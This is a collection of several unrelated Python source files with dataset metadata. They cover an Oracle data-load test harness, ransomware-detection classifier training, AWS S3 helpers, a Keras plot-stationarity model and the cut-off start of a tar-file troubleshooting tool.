if not connect_file:\r\n app_logger.error('Library {LIBRARY_NAME} does not exist'\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME))\r\n sys.exit(1)\r\n #Validate raw data files\r\n if not os.path.isdir(LOCAL_DIR):\r\n app_logger.error('Input dir {LOCAL_DIR} does not exist'\\\r\n .format(LOCAL_DIR=LOCAL_DIR))\r\n sys.exit(1)\r\n if len(glob.glob(os.path.join(LOCAL_DIR,MASK))) ==0:\r\n app_logger.error('No raw data files available in {LOCAL_DIR}'\\\r\n .format(LOCAL_DIR=LOCAL_DIR))\r\n sys.exit(1)\r\n\r\n #Create HlxTools object\r\n hlxtools=HlxTools(DB_USER,DB_PASSWORD,ORACLE_SID,DB_HOST,INSTANCE_ID,MASK,\r\n LOCAL_DIR)\r\n\r\n #Kill connect\r\n app_logger.info('Stopping connect file')\r\n os_tools.kill_process('connect','{LIBRARY_NAME}_{INSTANCE_ID}'\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME,\r\n INSTANCE_ID=INSTANCE_ID))\r\n\r\n\r\n #Parse DBL file\r\n hlxtools.parse_dbl(DVX2_IMP_DIR,connect_file)\r\n hlxtools.activate_dbl_oracle(DVX2_IMP_DIR)\r\n\r\n # #REMOVE\r\n # #Get the DBL errors after running the simulation\r\n # error_list=hlxtools.parse_dbl_error_files()\r\n # #Get data loaded into the tables\r\n # oracle_cfg_data=hlxtools.load_cfg_data_oracle(\r\n # partrans.configuration[\"schema\"])\r\n # oracle_data=hlxtools.load_data_oracle(partrans.transformed_data,\r\n # partrans.configuration[\"schema\"])\r\n # #Compare the data\r\n # data_report=hlxtools.compare_data(partrans,\r\n # oracle_data,\r\n # parse_hld,\r\n # oracle_cfg_data)\r\n # report={}\r\n # report['data_report']=data_report\r\n # report['error_list']=error_list\r\n # report['table_list']=list(parse_hld.metadata['Tables'].dropna(how='all')\r\n # ['Table Name'])\r\n # #Generate the report\r\n # testreportjunit=TestReportJunit(report)\r\n # testreportjunit.create_db_errors()\r\n # testreportjunit.create_data_summary()\r\n # testreportjunit.create_data_missing()\r\n # testreportjunit.create_data_diffs()\r\n # testreportjunit.create_missing_cols()\r\n # testreportjunit.save_file(TEST_REPORT_FILE_JUNIT)\r\n # sys.exit(0)\r\n # #REMOVE\r\n\r\n #Create GD Access\r\n access_id=hlxtools.create_access(LIBRARY_NAME)\r\n if not access_id:\r\n app_logger.error('Access could not be created')\r\n sys.exit(1)\r\n\r\n #Delete the data in the tables\r\n hlxtools.delete_data(partrans.transformed_data)\r\n\r\n #Remove dbl temp Files\r\n hlxtools.remove_dbl_files()\r\n\r\n #Run connect\r\n worker = Thread(target=hlxtools.run_connect, args=(access_id,\r\n LIBRARY_NAME))\r\n worker.setDaemon(True)\r\n worker.start()\r\n #Wait for connect to come up\r\n hlxtools.wait_connect()\r\n \r\n #restore Dbl ActiveStatus\r\n hlxtools.restore_dbl_oracle(DVX2_IMP_DIR)\r\n\r\n #Copy rd files to input folder\r\n hlxtools.copy_rd()\r\n\r\n #Wait for raw data to be processed\r\n hlxtools.wait_rd()\r\n app_logger.info('sleeping 180 seconds')\r\n time.sleep(180)\r\n\r\n #Wait for bcp files to be processed\r\n hlxtools.wait_bcp()\r\n\r\n #Schedule CfgTables\r\n hlxtools.schedule_cf_tables(partrans.configuration[\"schema\"])\r\n #Run CfgTables\r\n hlxtools.run_cf_tables(partrans.configuration[\"schema\"])\r\n app_logger.info('sleeping 60 seconds')\r\n time.sleep(60)\r\n #Schedule Aggregations\r\n hlxtools.schedule_aggr(partrans.configuration[\"schema\"])\r\n #Run Aggregations\r\n hlxtools.run_aggr(partrans.configuration[\"schema\"])\r\n app_logger.info('sleeping 60 seconds')\r\n time.sleep(60)\r\n #Update Thinout\r\n # hlxtools.update_thinout(partrans.configuration[\"schema\"])\r\n\r\n #Get the DBL errors after running the simulation\r\n error_list=hlxtools.parse_dbl_error_files()\r\n #Get data loaded into the tables\r\n oracle_data=hlxtools.load_data_oracle(partrans.transformed_data,\r\n partrans.configuration[\"schema\"])\r\n #Get data loaded into the cfg tables\r\n oracle_cfg_data=hlxtools.load_cfg_data_oracle(\r\n partrans.configuration[\"schema\"])\r\n #Compare the data\r\n data_report=hlxtools.compare_data(partrans,\r\n oracle_data,\r\n parse_hld,\r\n oracle_cfg_data)\r\n report={}\r\n report['data_report']=data_report\r\n report['error_list']=error_list\r\n report['table_list']=list(parse_hld.metadata['Tables'].dropna(how='all')\r\n ['Table Name'])\r\n #Generate the report\r\n testreportjunit=TestReportJunit(report)\r\n testreportjunit.create_db_errors()\r\n testreportjunit.create_data_summary()\r\n testreportjunit.create_data_missing()\r\n testreportjunit.create_data_diffs()\r\n testreportjunit.create_missing_cols()\r\n testreportjunit.save_file(TEST_REPORT_FILE_JUNIT)\r\n\r\n #Kill connect\r\n app_logger.info('Stopping connect file')\r\n os_tools.kill_process('connect','{LIBRARY_NAME}_{INSTANCE_ID}'\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME,\r\n INSTANCE_ID=INSTANCE_ID))\r\n\r\nif __name__ == \"__main__\":\r\n conf_file=\"\"\r\n logger=LoggerInit()\r\n main()\r\n", "repo_name": "xneyder/chill", "sub_path": "chill.py", "file_name": "chill.py", "file_ext": "py", "file_size_in_byte": 7651, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 51, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "Partrans.Partrans", "line_number": 55, "usage_type": "call"}, {"api_name": "ParseHLD.ParseHLD", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 76, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 80, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 97, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 101, "usage_type": "call"}, {"api_name": "HlxTools.HlxTools", "line_number": 104, "usage_type": "call"}, {"api_name": "os_tools.kill_process", "line_number": 109, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 151, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 160, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 176, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 186, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 192, "usage_type": "call"}, {"api_name": "TestReport.TestReportJunit", "line_number": 215, "usage_type": "call"}, {"api_name": "os_tools.kill_process", "line_number": 225, "usage_type": "call"}, {"api_name": "LoggerInit.LoggerInit", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "27434711722", "text": "import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import MinMaxScaler\nimport pickle\n\n#%%\ndef loadData():\n \"\"\"\n This function load the dataset from csv file\n Returns two DataFrame the first is X and the second is the label Y\n -------\n df : DataFrame\n X loaded from the RecapV3.csv.\n outputDF : DataFrame\n Y the label.\n \"\"\"\n \"\"\"load data from CSV files\"\"\"\n df = pd.read_csv(\"recap.csv\", index_col=False, sep=';')\n outputDF = pd.read_csv(\"out.csv\", index_col=False, sep=';')\n ##outputDF.drop(axis=1, columns=outputDF.columns[1], inplace=True)\n print('Data loaded')\n print(df.shape)\n return df,outputDF\n#%%\ndef normalizeDataSet(df):\n \"\"\"use MinMaxScaler to normalize df.\"\"\"\n scaler = MinMaxScaler()\n scaler.fit(df)\n normaLizedX = scaler.transform(df.values)\n dff = pd.DataFrame(normaLizedX)\n dff.columns = df.columns\n df = dff\n return df\n#%%\ndef trainModels(df):\n \"\"\"train model and show their accuracy.\"\"\"\n #Train a Decision Tree\n rng = np.random.RandomState(1)\n DTC = DecisionTreeClassifier(max_depth=80)\n DTC.fit(X_train, y_train)\n \n #Train an AdaBoost with Decision Tree\n rng = np.random.RandomState(1)\n AdaBoostDT = AdaBoostClassifier(\n DecisionTreeClassifier(max_depth=24), n_estimators=100, random_state=rng)\n AdaBoostDT.fit(X_train, y_train)\n\n #Train a MLP model\n mlp = MLPClassifier(alpha=1e-5,\n hidden_layer_sizes=(200, 100),\n random_state=1,\n activation=\"tanh\",\n max_iter=200)\n mlp.fit(X_train, y_train)\n \n \n #Train an SVM model\n svmModel = svm.LinearSVC()\n svmModel.fit(X_train, y_train)\n\n #Train a Random Forest\n rndmForest = RandomForestClassifier()\n rndmForest.fit(X_train, y_train)\n \n \n #Train a LogisticRegression\n clfLR = LogisticRegression(random_state=0).fit(X_train, y_train) \n \n # saving models to disk\n pickle.dump(rndmForest, open('rf.sav', 'wb'))\n pickle.dump(clfLR, open('clfr.sav', 'wb'))\n pickle.dump(svmModel, open('svm.sav', 'wb'))\n pickle.dump(mlp, open('mlp.sav', 'wb'))\n pickle.dump(AdaBoostDT, open('AdaBoostDT.sav', 'wb'))\n pickle.dump(DTC, open('dtc.sav', 'wb'))\n\n\n \n \n print('Models Accuracy ---------------')\n print(\"DecisionTree\", \"{:.2f}\".format(DTC.score(X_test, y_test)*100))\n print(\"AdaBoost DecitionTree\", \"{:.2f}\".format(AdaBoostDT.score(X_test, y_test)*100))\n print(\"MLP\", \"{:.2f}\".format(mlp.score(X_test, y_test)*100))\n print(\"RandomForestClassifier \", \"{:.2f}\".format(rndmForest.score(X_test, y_test)*100))\n\n print(\"SVM: \", \"{:.2f}\".format(svmModel.score(X_test, y_test)*100))\n print(\"Logistic Regression model : \", \"{:.2f}\".format(clfLR.score(X_test, y_test)*100))\n print('------------------------------------')\n#%%\ndf,outDF=loadData()\n#%%\nprint(\"Normalizing dataset\")\ndf=normalizeDataSet(df)\n#split the dataset to 30% test and 70% training.\nX_train, X_test, y_train, y_test = train_test_split(\n df.values, outDF.y, test_size=0.30, random_state=42)\ntrainModels(df)", "repo_name": "ryaddaoud21/RANSOMWARES-DETECTION", "sub_path": "users/dataset/PiratDown.py", "file_name": "PiratDown.py", "file_ext": "py", "file_size_in_byte": 3472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 65, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 74, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 77, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 78, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 80, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 81, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 82, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "916815395", "text": "import boto3\nfrom io import StringIO\nimport pandas as pd\nimport pickle\nimport logging\nimport os\n\n\ndef define_supported_pages():\n \n supported_pages = {\n 'other': ['other'], # can have multiple\n '1120s': ['1120spage1', '1120spage3', '1120spage4', '1120spage5'],\n '1040': ['1040page1', '1040page2'], \n 'schedulec': ['schedulecpage1', 'schedulecpage2'], # can have multiple\n 'schedulee': ['scheduleepage1'], # can have multiple # can be missing page 2\n '1065': ['1065page1', '1065page4', '1065page5'],\n 'k11065': ['k11065page1'], # can have multiple and be uploaded with 1065 or with a 1040\n '8825': ['8825page1', '8825page2'], # can have multiple # can be missing page 2\n '1120': ['1120page1', '1120page5', '1120page6'], # page 6 added in 2018\n 'schedule1': ['schedule1page1'],\n 'schedule2': ['schedule2page1'],\n 'schedule3': ['schedule3page1'],\n 'schedule4': ['schedule4page1'],\n }\n\n return supported_pages\n\n\ndef define_multiple_pages_ok():\n \n # forms/pages that may have multiple uploaded\n multiple_pages_ok = ['schedulecpage1', 'schedulecpage2', 'scheduleepage1', 'k11065page1', '8825page1', '8825page2', 'other']\n \n return multiple_pages_ok\n \n\ndef define_k1_forms():\n \n # documents a k-1 can be affiliated with\n k1_forms = ['schedulecpage1', '1040page1']\n \n return k1_forms\n \n \ndef store_pickle(file, path, file_name):\n \n # write-binary (wb) mode\n with open(path + file_name + '.pickle', 'wb') as handle:\n pickle.dump(file, handle)\n \n \ndef load_pickle(path, file_name): \n \n # read-binary (rb) mode\n with open(path + file_name + '.pickle', 'rb') as handle:\n file = pickle.load(handle)\n \n return file\n \n\ndef save_csv_to_s3(s3_client, bucket, df, path, file_name):\n \n csv_buffer = StringIO()\n df.to_csv(csv_buffer)\n s3_client.Object(bucket, path + file_name).put(Body=csv_buffer.getvalue())\n logging.info(\"{0} saved to {1} bucket\".format(file_name, path))\n\n\ndef load_csv_from_s3(s3_client, bucket, path, file_name):\n \n obj = s3_client.get_object(Bucket=bucket, Key=path + file_name)\n df = pd.read_csv(obj['Body'])\n logging.info(\"{0} loaded from {1} bucket\".format(file_name, path))\n \n return df\n \n \ndef assume_data_role():\n os.getenv('AWS_SESSION_TOKEN')\n \n sts_client = boto3.session.Session().client(\"sts\")\n assumed_role_response = sts_client.assume_role(\n RoleArn=\"arn:aws:iam::785302336464:role/ocr-client-gulfcoast-test-data\", RoleSessionName=\"AssumeRoleSession1\"\n )\n \n credentials = assumed_role_response[\"Credentials\"]\n ds_session = boto3.session.Session(\n aws_access_key_id=credentials[\"AccessKeyId\"],\n aws_secret_access_key=credentials[\"SecretAccessKey\"],\n aws_session_token=credentials[\"SessionToken\"],\n region_name=\"us-east-1\",\n )\n \n sts_client_ds = ds_session.client(\"sts\")\n assumed_role_response_data = sts_client_ds.assume_role(\n RoleArn=\"arn:aws:iam::279307629071:role/ndr-client-gulfcoast-test-data\", RoleSessionName=\"AssumeRoleSession1\"\n )\n \n credentials_data = assumed_role_response_data[\"Credentials\"]\n data_session = boto3.session.Session(\n aws_access_key_id=credentials_data[\"AccessKeyId\"],\n aws_secret_access_key=credentials_data[\"SecretAccessKey\"],\n aws_session_token=credentials_data[\"SessionToken\"],\n region_name=\"us-east-1\",\n )\n \n print(data_session.client(\"sts\").get_caller_identity())\n s3_resource = data_session.resource('s3')\n s3_client = data_session.client('s3')\n \n return s3_resource, s3_client", "repo_name": "ncino-billstuart/nDR-page-prediction", "sub_path": "app/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 3701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pickle.dump", "line_number": 50, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 57, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 80, "usage_type": "call"}, {"api_name": "boto3.session.Session", "line_number": 82, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 82, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 88, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 88, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 101, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 101, "usage_type": "attribute"}]} +{"seq_id": "31411287550", "text": "import os\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom time_series_plot_auto_analysis.categories.stationarity import Stationarity\n\n\nclass StationarityDetection:\n\n def train_model_and_save(self, plots_directory_path=None, models_path=None, validation_split=0.2, batch_size=32,\n epochs=3):\n\n plot_image_height, plot_image_width, plot_image_color = self._get_plot_image_height_width_and_color(\n plots_directory_path=plots_directory_path)\n\n train_dataset, validation_dataset = self._get_datasets(batch_size, plot_image_height, plot_image_width,\n plots_directory_path, validation_split)\n\n model = self._train_model(plot_image_height, plot_image_width, plot_image_color,\n train_dataset, validation_dataset, epochs=epochs)\n\n model.save(models_path)\n\n return model\n\n def detect(self, models_path=None, prediction_plot_file_path=None):\n\n plot_image = cv2.imread(prediction_plot_file_path)\n plot_image_height = plot_image.shape[0]\n plot_image_width = plot_image.shape[1]\n prediction_plot = keras.utils.load_img(\n prediction_plot_file_path, target_size=(plot_image_height, plot_image_width)\n )\n prediction_plot_array = tf.keras.utils.img_to_array(prediction_plot)\n prediction_plot_array = tf.expand_dims(prediction_plot_array, 0)\n\n model = self._load_model(models_path=models_path)\n prediction_plot_predictions = model.predict(prediction_plot_array)\n prediction_plot_prediction_score = tf.nn.softmax(prediction_plot_predictions[0])\n\n stationarity_enum_list = [stationarity for stationarity in Stationarity]\n return stationarity_enum_list[np.argmax(prediction_plot_prediction_score)]\n\n def _load_model(self, models_path=None):\n return keras.models.load_model(models_path)\n\n def _get_plot_image_height_width_and_color(self, plots_directory_path=None):\n sample_plot_file_name = os.listdir(os.path.join(plots_directory_path, Stationarity.stationary.value))[0]\n sample_plot_file_path = os.path.join(plots_directory_path, Stationarity.stationary.value, sample_plot_file_name)\n plot_image = cv2.imread(sample_plot_file_path)\n return plot_image.shape\n\n def _get_datasets(self, batch_size, plot_image_height, plot_image_width, plots_directory_path, validation_split):\n train_dataset = keras.utils.image_dataset_from_directory(\n plots_directory_path,\n validation_split=validation_split,\n subset=\"training\",\n seed=123,\n image_size=(plot_image_height, plot_image_width),\n batch_size=batch_size)\n validation_dataset = keras.utils.image_dataset_from_directory(\n plots_directory_path,\n validation_split=validation_split,\n subset=\"validation\",\n seed=123,\n image_size=(plot_image_height, plot_image_width),\n batch_size=batch_size)\n # Configure the dataset for performance\n train_dataset = train_dataset.cache().prefetch(buffer_size=tf.data.AUTOTUNE)\n validation_dataset = validation_dataset.cache().prefetch(buffer_size=tf.data.AUTOTUNE)\n\n return train_dataset, validation_dataset\n\n def _train_model(self, plot_image_height, plot_image_width, plot_image_color,\n train_dataset, validation_dataset, epochs=3):\n \"\"\"\n This method is unique to each kind of plot, which is implemented\n in subclass.\n The implementation here is the default implementation.\n \"\"\"\n\n num_classes = 2\n model = keras.Sequential([\n keras.layers.Rescaling(1. / 255, input_shape=(plot_image_height, plot_image_width, plot_image_color)),\n keras.layers.Conv2D(16, 3, activation='relu'),\n keras.layers.MaxPooling2D(),\n keras.layers.Conv2D(32, 3, activation='relu'),\n keras.layers.MaxPooling2D(),\n keras.layers.Conv2D(64, 3, activation='relu'),\n keras.layers.MaxPooling2D(),\n keras.layers.Flatten(),\n keras.layers.Dense(128, activation='relu'),\n keras.layers.Dense(num_classes)\n ])\n\n model.compile(\n optimizer='adam',\n loss=tf.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n model.fit(\n train_dataset,\n validation_data=validation_dataset,\n epochs=epochs\n )\n\n return model\n", "repo_name": "tadatoshi/time_series_plot_auto_analysis", "sub_path": "time_series_plot_auto_analysis/analysis.py", "file_name": "analysis.py", "file_ext": "py", "file_size_in_byte": 4714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.load_img", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "name"}, {"api_name": "tensorflow.keras.utils.img_to_array", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 46, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity.stationary", "line_number": 49, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity.stationary", "line_number": 50, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity", "line_number": 50, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.image_dataset_from_directory", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "name"}, {"api_name": "tensorflow.keras.utils.image_dataset_from_directory", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 62, "usage_type": "name"}, {"api_name": "tensorflow.data", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 84, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Rescaling", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 85, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 86, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 87, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 90, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 91, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 92, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 93, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 94, "usage_type": "name"}, {"api_name": "tensorflow.losses.SparseCategoricalCrossentropy", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "27984493856", "text": "import tarfile\r\nimport os\r\nimport sys\r\nimport re\r\nimport sys\r\nimport cchardet as chardet\r\nfrom pathlib import Path\r\n\r\n# Script details - feel free to contact!\r\nauthor_name = \"Renan Hingel\"\r\nauthor_contact = \"renanhingel@gmail.com\"\r\ngit_url = \"https://github.com/RenanHingel/tarshooter\"\r\nscript_version = \"1.0.5\"\r\n\r\n# ANSI color codes\r\nBLUE = \"\\033[0;34m\"\r\nCYAN = \"\\033[0;36m\"\r\nLIGHT_BLUE = \"\\033[1;34m\"\r\nLIGHT_CYAN = \"\\033[1;36m\"\r\nLIGHT_RED = \"\\033[1;31m\"\r\nCEND = \"\\033[0m\"\r\n\r\n\r\ndef makedir(directory):\r\n # Check if the informed directory exists\r\n is_exist = os.path.exists(directory)\r\n\r\n # If it does not exist, create it and print to console terminal\r\n if not is_exist:\r\n os.makedirs(directory)\r\n print(\"Created directory: \" + LIGHT_CYAN + directory + CEND + \".\")\r\n\r\n\r\ndef untar(file, directory):\r\n # Open the compressed file\r\n file = tarfile.open(file)\r\n\r\n # Print the compressed file contents\r\n print(\"Files found: \" + LIGHT_CYAN + str(file.getnames()) + \".\" + CEND)\r\n print(\"------------------------------------------------------------------------\")\r\n # Extract and close\r\n file.extractall(directory)\r\n file.close()\r\n\r\n\r\ndef tshoot(workdir):\r\n # We will create a command dictionary so we can store the commands found later\r\n commands_dict = {}\r\n\r\n # The delimiter variable will help us find the useful lines\r\n delimiter = \"******** show \"\r\n last_line = 0\r\n # What we want to clean from the file\r\n clean = \"******** \"\r\n clean2 = \" *******\"\r\n\r\n # Open the file supplied by the user and detect it's encoding type\r\n filepath = Path(workdir)\r\n undetected_file = filepath.read_bytes()\r\n detect_file = chardet.detect(undetected_file)\r\n\r\n with open(workdir, \"r\", encoding=detect_file[\"encoding\"]) as raw_text:\r\n read_text = raw_text.readlines()\r\n\r\n # Now, enumerate all lines inside the file and remove the \\n characters with strip\r\n for index, line in enumerate(read_text):\r\n line_count = index + 1\r\n last_line = index + 1\r\n strip_line = line.strip()\r\n if delimiter in strip_line:\r\n strip_line = strip_line.replace(clean, \"\")\r\n strip_line = strip_line.replace(clean2, \"\")\r\n # After cleaning the lines, append them to our dictionary\r\n commands_dict[strip_line] = line_count\r\n\r\n while True:\r\n # Troubleshoot mode menu\r\n command = input(\"Enter a \" + LIGHT_CYAN + \"[specific command]\" + CEND + \", \" + LIGHT_CYAN + \"[all]\"\r\n + CEND + \" to see all available commands or \" + LIGHT_CYAN + \"[1]\"\r\n + CEND + \" to quit to main menu: \")\r\n # Option 1 - exit\r\n if command == \"1\":\r\n break\r\n # Option all - will 